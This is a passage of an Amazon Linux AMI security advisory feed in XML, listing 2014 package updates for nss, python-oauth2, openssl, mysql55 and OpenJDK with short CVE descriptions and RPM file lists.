arch="x86_64"><filename>Packages/nss-softokn-freebl-3.16.2-2.2.amzn1.x86_64.rpm</filename></package><package name="nss-softokn-debuginfo" version="3.16.2" release="2.2.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-debuginfo-3.16.2-2.2.amzn1.i686.rpm</filename></package><package name="nss-softokn-devel" version="3.16.2" release="2.2.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-devel-3.16.2-2.2.amzn1.i686.rpm</filename></package><package name="nss-softokn-freebl-devel" version="3.16.2" release="2.2.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-freebl-devel-3.16.2-2.2.amzn1.i686.rpm</filename></package><package name="nss-softokn" version="3.16.2" release="2.2.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-3.16.2-2.2.amzn1.i686.rpm</filename></package><package name="nss-softokn-freebl" version="3.16.2" release="2.2.amzn1" epoch="0" 
arch="i686"><filename>Packages/nss-softokn-freebl-3.16.2-2.2.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-424</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-424: important priority package update for nss</title><issued date="2014-10-01 16:32:00" /><updated date="2014-10-01 18:53:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-1568:
A flaw was found in the way NSS parsed ASN.1 (Abstract Syntax Notation One) input from certain RSA signatures. A remote attacker could use this flaw to forge RSA certificates by providing a specially crafted signature to an application using NSS.
1145429:
CVE-2014-1568 nss: RSA PKCS#1 signature verification forgery flaw (MFSA 2014-73)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1568" title="" id="CVE-2014-1568" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nss" version="3.16.2" release="7.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-3.16.2-7.49.amzn1.x86_64.rpm</filename></package><package name="nss-sysinit" version="3.16.2" release="7.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-sysinit-3.16.2-7.49.amzn1.x86_64.rpm</filename></package><package name="nss-tools" version="3.16.2" release="7.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-tools-3.16.2-7.49.amzn1.x86_64.rpm</filename></package><package name="nss-debuginfo" version="3.16.2" release="7.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-debuginfo-3.16.2-7.49.amzn1.x86_64.rpm</filename></package><package name="nss-devel" version="3.16.2" release="7.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-devel-3.16.2-7.49.amzn1.x86_64.rpm</filename></package><package name="nss-pkcs11-devel" version="3.16.2" release="7.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-pkcs11-devel-3.16.2-7.49.amzn1.x86_64.rpm</filename></package><package name="nss-pkcs11-devel" version="3.16.2" release="7.49.amzn1" epoch="0" arch="i686"><filename>Packages/nss-pkcs11-devel-3.16.2-7.49.amzn1.i686.rpm</filename></package><package name="nss-debuginfo" version="3.16.2" release="7.49.amzn1" epoch="0" arch="i686"><filename>Packages/nss-debuginfo-3.16.2-7.49.amzn1.i686.rpm</filename></package><package name="nss-devel" version="3.16.2" release="7.49.amzn1" epoch="0" arch="i686"><filename>Packages/nss-devel-3.16.2-7.49.amzn1.i686.rpm</filename></package><package name="nss-sysinit" version="3.16.2" release="7.49.amzn1" epoch="0" arch="i686"><filename>Packages/nss-sysinit-3.16.2-7.49.amzn1.i686.rpm</filename></package><package name="nss-tools" version="3.16.2" release="7.49.amzn1" epoch="0" 
arch="i686"><filename>Packages/nss-tools-3.16.2-7.49.amzn1.i686.rpm</filename></package><package name="nss" version="3.16.2" release="7.49.amzn1" epoch="0" arch="i686"><filename>Packages/nss-3.16.2-7.49.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-425</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-425: medium priority package update for python-oauth2</title><issued date="2014-10-14 10:04:00" /><updated date="2014-10-14 12:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4347:
The (1) make_nonce, (2) generate_nonce, and (3) generate_verifier functions in SimpleGeo python-oauth2 use weak random numbers to generate nonces, which makes it easier for remote attackers to guess the nonce via a brute force attack.
1007758:
CVE-2013-4347 python-oauth2: Uses poor PRNG in nonce
CVE-2013-4346:
The Server.verify_request function in SimpleGeo python-oauth2 does not check the nonce, which allows remote attackers to perform replay attacks via a signed URL.
1007746:
CVE-2013-4346 python-oauth2: _check_signature() ignores the nonce value when validating signed urls
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4346" title="" id="CVE-2013-4346" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4347" title="" id="CVE-2013-4347" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python-oauth2" version="1.5.211" release="7.1.amzn1" epoch="0" arch="noarch"><filename>Packages/python-oauth2-1.5.211-7.1.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-426</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-426: important priority package update for openssl</title><issued date="2014-10-14 22:32:00" /><updated date="2014-10-14 23:34:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-3566:
1152789:
CVE-2014-3566 openssl: Padding Oracle On Downgraded Legacy Encryption attack
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566" title="" id="CVE-2014-3566" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl-debuginfo" version="1.0.1i" release="1.79.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.1i-1.79.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.1i" release="1.79.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-static-1.0.1i-1.79.amzn1.x86_64.rpm</filename></package><package name="openssl-perl" version="1.0.1i" release="1.79.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-perl-1.0.1i-1.79.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.1i" release="1.79.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-devel-1.0.1i-1.79.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.1i" release="1.79.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-1.0.1i-1.79.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.1i" release="1.79.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-1.0.1i-1.79.amzn1.i686.rpm</filename></package><package name="openssl-debuginfo" version="1.0.1i" release="1.79.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-debuginfo-1.0.1i-1.79.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.1i" release="1.79.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-perl-1.0.1i-1.79.amzn1.i686.rpm</filename></package><package name="openssl-devel" version="1.0.1i" release="1.79.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-devel-1.0.1i-1.79.amzn1.i686.rpm</filename></package><package name="openssl-static" version="1.0.1i" release="1.79.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-static-1.0.1i-1.79.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" 
version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-427</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-427: important priority package update for openssl</title><issued date="2014-10-15 16:14:00" /><updated date="2014-10-15 18:38:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-3568:
1152967:
CVE-2014-3568 openssl: Build option no-ssl3 is incomplete
CVE-2014-3567:
A memory leak flaw was found in the way OpenSSL handled failed session ticket integrity checks. A remote attacker could exhaust all available memory of an SSL/TLS or DTLS server by sending a large number of invalid session tickets to that server.
1152961:
CVE-2014-3567 openssl: Invalid TLS/SSL session tickets could cause memory leak leading to server crash
CVE-2014-3513:
A memory leak flaw was found in the way OpenSSL parsed the DTLS Secure Real-time Transport Protocol (SRTP) extension data. A remote attacker could send multiple specially crafted handshake messages to exhaust all available memory of an SSL/TLS or DTLS server.
1152953:
CVE-2014-3513 openssl: SRTP memory leak causes crash when using specially-crafted handshake message
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3513" title="" id="CVE-2014-3513" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3567" title="" id="CVE-2014-3567" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3568" title="" id="CVE-2014-3568" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl" version="1.0.1j" release="1.80.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-1.0.1j-1.80.amzn1.x86_64.rpm</filename></package><package name="openssl-perl" version="1.0.1j" release="1.80.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-perl-1.0.1j-1.80.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.1j" release="1.80.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.1j-1.80.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.1j" release="1.80.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-static-1.0.1j-1.80.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.1j" release="1.80.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-devel-1.0.1j-1.80.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.1j" release="1.80.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-1.0.1j-1.80.amzn1.i686.rpm</filename></package><package name="openssl-debuginfo" version="1.0.1j" release="1.80.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-debuginfo-1.0.1j-1.80.amzn1.i686.rpm</filename></package><package name="openssl-devel" version="1.0.1j" release="1.80.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-devel-1.0.1j-1.80.amzn1.i686.rpm</filename></package><package name="openssl-static" version="1.0.1j" release="1.80.amzn1" epoch="1" 
arch="i686"><filename>Packages/openssl-static-1.0.1j-1.80.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.1j" release="1.80.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-perl-1.0.1j-1.80.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-428</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-428: important priority package update for mysql55</title><issued date="2014-10-16 22:14:00" /><updated date="2014-10-16 22:20:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-6559:
Unspecified vulnerability in Oracle MySQL Server 5.5.39 and earlier, and 5.6.20 and earlier, allows remote attackers to affect confidentiality via vectors related to C API SSL CERTIFICATE HANDLING.
1153496:
CVE-2014-6559 mysql: unspecified vulnerability related to C API SSL CERTIFICATE HANDLING (CPU October 2014)
CVE-2014-6500:
Unspecified vulnerability in Oracle MySQL Server 5.5.39 and earlier, and 5.6.20 and earlier, allows remote attackers to affect confidentiality, integrity, and availability via vectors related to SERVER:SSL:yaSSL, a different vulnerability than CVE-2014-6491.
1153487:
CVE-2014-6500 mysql: unspecified vulnerability related to SERVER:SSL:yaSSL (CPU October 2014)
CVE-2014-6494:
Unspecified vulnerability in Oracle MySQL Server 5.5.39 and earlier, and 5.6.20 and earlier, allows remote attackers to affect availability via vectors related to CLIENT:SSL:yaSSL, a different vulnerability than CVE-2014-6496.
1153484:
CVE-2014-6494 mysql: unspecified vulnerability related to CLIENT:SSL:yaSSL (CPU October 2014)
CVE-2014-6491:
Unspecified vulnerability in Oracle MySQL Server 5.5.39 and earlier and 5.6.20 and earlier allows remote attackers to affect confidentiality, integrity, and availability via vectors related to SERVER:SSL:yaSSL, a different vulnerability than CVE-2014-6500.
1153483:
CVE-2014-6491 mysql: unspecified vulnerability related to SERVER:SSL:yaSSL (CPU October 2014)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6491" title="" id="CVE-2014-6491" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6494" title="" id="CVE-2014-6494" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6500" title="" id="CVE-2014-6500" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6559" title="" id="CVE-2014-6559" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql55-embedded" version="5.5.40" release="1.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-embedded-5.5.40-1.3.amzn1.x86_64.rpm</filename></package><package name="mysql55-embedded-devel" version="5.5.40" release="1.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-embedded-devel-5.5.40-1.3.amzn1.x86_64.rpm</filename></package><package name="mysql55-test" version="5.5.40" release="1.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-test-5.5.40-1.3.amzn1.x86_64.rpm</filename></package><package name="mysql55-server" version="5.5.40" release="1.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-server-5.5.40-1.3.amzn1.x86_64.rpm</filename></package><package name="mysql55-devel" version="5.5.40" release="1.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-devel-5.5.40-1.3.amzn1.x86_64.rpm</filename></package><package name="mysql55-common" version="5.5.40" release="1.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-common-5.5.40-1.3.amzn1.x86_64.rpm</filename></package><package name="mysql55-debuginfo" version="5.5.40" release="1.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-debuginfo-5.5.40-1.3.amzn1.x86_64.rpm</filename></package><package name="mysql55-bench" version="5.5.40" release="1.3.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/mysql55-bench-5.5.40-1.3.amzn1.x86_64.rpm</filename></package><package name="mysql55" version="5.5.40" release="1.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-5.5.40-1.3.amzn1.x86_64.rpm</filename></package><package name="mysql55-libs" version="5.5.40" release="1.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-libs-5.5.40-1.3.amzn1.x86_64.rpm</filename></package><package name="mysql55-common" version="5.5.40" release="1.3.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-common-5.5.40-1.3.amzn1.i686.rpm</filename></package><package name="mysql55-embedded-devel" version="5.5.40" release="1.3.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-embedded-devel-5.5.40-1.3.amzn1.i686.rpm</filename></package><package name="mysql55-devel" version="5.5.40" release="1.3.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-devel-5.5.40-1.3.amzn1.i686.rpm</filename></package><package name="mysql55-debuginfo" version="5.5.40" release="1.3.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-debuginfo-5.5.40-1.3.amzn1.i686.rpm</filename></package><package name="mysql55-embedded" version="5.5.40" release="1.3.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-embedded-5.5.40-1.3.amzn1.i686.rpm</filename></package><package name="mysql55-bench" version="5.5.40" release="1.3.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-bench-5.5.40-1.3.amzn1.i686.rpm</filename></package><package name="mysql55-test" version="5.5.40" release="1.3.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-test-5.5.40-1.3.amzn1.i686.rpm</filename></package><package name="mysql55-server" version="5.5.40" release="1.3.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-server-5.5.40-1.3.amzn1.i686.rpm</filename></package><package name="mysql55-libs" version="5.5.40" release="1.3.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-libs-5.5.40-1.3.amzn1.i686.rpm</filename></package><package name="mysql55" 
version="5.5.40" release="1.3.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-5.5.40-1.3.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-429</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-429: important priority package update for nss</title><issued date="2014-10-16 22:14:00" /><updated date="2014-10-16 22:21:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-3566:
1152789:
CVE-2014-3566 openssl: Padding Oracle On Downgraded Legacy Encryption attack
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566" title="" id="CVE-2014-3566" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nss" version="3.16.2" release="7.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-3.16.2-7.57.amzn1.x86_64.rpm</filename></package><package name="nss-tools" version="3.16.2" release="7.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-tools-3.16.2-7.57.amzn1.x86_64.rpm</filename></package><package name="nss-debuginfo" version="3.16.2" release="7.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-debuginfo-3.16.2-7.57.amzn1.x86_64.rpm</filename></package><package name="nss-devel" version="3.16.2" release="7.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-devel-3.16.2-7.57.amzn1.x86_64.rpm</filename></package><package name="nss-pkcs11-devel" version="3.16.2" release="7.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-pkcs11-devel-3.16.2-7.57.amzn1.x86_64.rpm</filename></package><package name="nss-sysinit" version="3.16.2" release="7.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-sysinit-3.16.2-7.57.amzn1.x86_64.rpm</filename></package><package name="nss" version="3.16.2" release="7.57.amzn1" epoch="0" arch="i686"><filename>Packages/nss-3.16.2-7.57.amzn1.i686.rpm</filename></package><package name="nss-sysinit" version="3.16.2" release="7.57.amzn1" epoch="0" arch="i686"><filename>Packages/nss-sysinit-3.16.2-7.57.amzn1.i686.rpm</filename></package><package name="nss-devel" version="3.16.2" release="7.57.amzn1" epoch="0" arch="i686"><filename>Packages/nss-devel-3.16.2-7.57.amzn1.i686.rpm</filename></package><package name="nss-tools" version="3.16.2" release="7.57.amzn1" epoch="0" arch="i686"><filename>Packages/nss-tools-3.16.2-7.57.amzn1.i686.rpm</filename></package><package name="nss-debuginfo" version="3.16.2" release="7.57.amzn1" epoch="0" 
arch="i686"><filename>Packages/nss-debuginfo-3.16.2-7.57.amzn1.i686.rpm</filename></package><package name="nss-pkcs11-devel" version="3.16.2" release="7.57.amzn1" epoch="0" arch="i686"><filename>Packages/nss-pkcs11-devel-3.16.2-7.57.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-430</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-430: important priority package update for java-1.6.0-openjdk</title><issued date="2014-10-16 22:15:00" /><updated date="2014-10-16 22:22:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-6558:
It was discovered that the CipherInputStream class implementation in OpenJDK did not properly handle certain exceptions. This could possibly allow an attacker to affect the integrity of an encrypted stream handled by this class.
CVE-2014-6531:
Multiple flaws were discovered in the Libraries, 2D, and Hotspot components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-6519:
Multiple flaws were discovered in the Libraries, 2D, and Hotspot components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-6517:
It was discovered that the StAX XML parser in the JAXP component in OpenJDK performed expansion of external parameter entities even when external entity substitution was disabled. A remote attacker could use this flaw to perform an XML eXternal Entity (XXE) attack against applications using the StAX parser to parse untrusted XML documents.
CVE-2014-6512:
It was discovered that the DatagramSocket implementation in OpenJDK failed to perform source address checks for packets received on a connected socket. A remote attacker could use this flaw to have their packets processed as if they were received from the expected source.
CVE-2014-6511:
Multiple flaws were discovered in the Libraries, 2D, and Hotspot components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-6506:
Multiple flaws were discovered in the Libraries, 2D, and Hotspot components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-6504:
Multiple flaws were discovered in the Libraries, 2D, and Hotspot components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-6502:
Multiple flaws were discovered in the Libraries, 2D, and Hotspot components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-6457:
It was discovered that the TLS/SSL implementation in the JSSE component in OpenJDK failed to properly verify the server identity during the renegotiation following session resumption, making it possible for malicious TLS/SSL servers to perform a Triple Handshake attack against clients using JSSE and client certificate authentication.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6457" title="" id="CVE-2014-6457" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6502" title="" id="CVE-2014-6502" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6504" title="" id="CVE-2014-6504" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6506" title="" id="CVE-2014-6506" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6511" title="" id="CVE-2014-6511" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6512" title="" id="CVE-2014-6512" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6517" title="" id="CVE-2014-6517" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6519" title="" id="CVE-2014-6519" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6531" title="" id="CVE-2014-6531" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6558" title="" id="CVE-2014-6558" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:1634.html" title="" id="RHSA-2014:1634" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.6.0-openjdk-demo" version="1.6.0.33" release="67.1.13.5.0.67.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.33-67.1.13.5.0.67.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.33" release="67.1.13.5.0.67.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.33-67.1.13.5.0.67.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.33" release="67.1.13.5.0.67.amzn1" epoch="1" 
arch="x86_64"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.33-67.1.13.5.0.67.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.33" release="67.1.13.5.0.67.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.33-67.1.13.5.0.67.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.33" release="67.1.13.5.0.67.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.33-67.1.13.5.0.67.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.33" release="67.1.13.5.0.67.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-1.6.0.33-67.1.13.5.0.67.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.33" release="67.1.13.5.0.67.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.33-67.1.13.5.0.67.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.33" release="67.1.13.5.0.67.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.33-67.1.13.5.0.67.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.33" release="67.1.13.5.0.67.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-1.6.0.33-67.1.13.5.0.67.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.33" release="67.1.13.5.0.67.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.33-67.1.13.5.0.67.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.33" release="67.1.13.5.0.67.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.33-67.1.13.5.0.67.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.33" release="67.1.13.5.0.67.amzn1" epoch="1" 
arch="i686"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.33-67.1.13.5.0.67.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-431</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-431: important priority package update for java-1.7.0-openjdk</title><issued date="2014-10-16 22:16:00" /><updated date="2014-10-16 22:23:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-6558:
It was discovered that the CipherInputStream class implementation in OpenJDK did not properly handle certain exceptions. This could possibly allow an attacker to affect the integrity of an encrypted stream handled by this class.
CVE-2014-6531:
Multiple flaws were discovered in the Libraries, 2D, and Hotspot components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-6519:
Multiple flaws were discovered in the Libraries, 2D, and Hotspot components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-6517:
It was discovered that the StAX XML parser in the JAXP component in OpenJDK performed expansion of external parameter entities even when external entity substitution was disabled. A remote attacker could use this flaw to perform an XML eXternal Entity (XXE) attack against applications using the StAX parser to parse untrusted XML documents.
CVE-2014-6512:
It was discovered that the DatagramSocket implementation in OpenJDK failed to perform source address checks for packets received on a connected socket. A remote attacker could use this flaw to have their packets processed as if they were received from the expected source.
CVE-2014-6511:
Multiple flaws were discovered in the Libraries, 2D, and Hotspot components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-6506:
Multiple flaws were discovered in the Libraries, 2D, and Hotspot components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-6504:
Multiple flaws were discovered in the Libraries, 2D, and Hotspot components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-6502:
Multiple flaws were discovered in the Libraries, 2D, and Hotspot components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-6457:
It was discovered that the TLS/SSL implementation in the JSSE component in OpenJDK failed to properly verify the server identity during the renegotiation following session resumption, making it possible for malicious TLS/SSL servers to perform a Triple Handshake attack against clients using JSSE and client certificate authentication.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6457" title="" id="CVE-2014-6457" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6502" title="" id="CVE-2014-6502" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6504" title="" id="CVE-2014-6504" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6506" title="" id="CVE-2014-6506" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6511" title="" id="CVE-2014-6511" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6512" title="" id="CVE-2014-6512" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6517" title="" id="CVE-2014-6517" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6519" title="" id="CVE-2014-6519" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6531" title="" id="CVE-2014-6531" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6558" title="" id="CVE-2014-6558" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:1620.html" title="" id="RHSA-2014:1620" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.71" release="2.5.3.1.49.amzn1" epoch="1" 